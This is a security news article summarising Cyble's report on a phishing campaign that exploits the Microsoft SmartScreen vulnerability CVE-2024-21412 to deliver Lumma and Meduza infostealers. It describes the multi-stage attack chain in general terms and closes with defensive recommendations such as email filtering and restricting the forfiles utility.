Cyble Research and Intelligence Labs (CRIL) researchers have recently discovered a concerning trend in the cybersecurity realm. An active campaign has been uncovered, where threat actors are exploiting a Microsoft SmartScreen vulnerability to inject infostealers into users’ machines. This vulnerability, known as CVE-2024-21412, was identified by Microsoft in February and even added to CISA’s known exploited vulnerabilities catalog. Despite the patch being available, it seems that there has been limited deployment, as the campaign continues to target users in various regions, including Spain, the U.S., and Australia.
In addition to CVE-2024-21412, another SmartScreen vulnerability (CVE-2024-29988) was patched by Microsoft in April. This continuous exploitation of vulnerabilities highlights the evolving nature of cybersecurity threats and the need for constant vigilance.
The campaign begins with phishing lures related to healthcare insurance schemes, transportation notices, and tax-related communications. These emails contain links that redirect users to WebDAV shares using a search protocol, deceiving them into executing a malicious internet shortcut file. The multi-stage attack that ensues utilizes legitimate tools such as forfiles.exe, PowerShell, and mshta to circumvent security measures and inject the final payload into explorer.exe, delivering Lumma and Meduza Stealer as the final payloads.
Earlier in January, the Zero Day Initiative (ZDI) discovered a sophisticated DarkGate campaign that exploited the CVE-2024-21412 vulnerability through fake software installers. Another group, Water Hydra, has been leveraging the same vulnerability in a targeted campaign against financial market traders, deploying the DarkMe remote access trojan (RAT).
The recent surge in the exploitation of CVE-2024-21412, coupled with the adoption of advanced techniques like DLL sideloading and IDATLoader combinations, underscores the evolving and dangerous threat landscape faced by cybersecurity professionals. Cyber threats are becoming increasingly dynamic, with the potential for more sophisticated attacks.
The Cyble researchers highlighted the importance of implementing robust cybersecurity controls to combat these threats effectively. They recommended utilizing advanced email filtering solutions, monitoring and restricting the forfiles utility, implementing application whitelisting, and employing network segmentation to protect critical workloads and prevent the spread of malware within an organization.
As cyber threats continue to evolve, it is crucial for organizations to stay vigilant and implement comprehensive cybersecurity measures to safeguard their systems and data. By being proactive and prepared, they can mitigate the risks posed by sophisticated cyber attacks and protect themselves from potential breaches and data loss.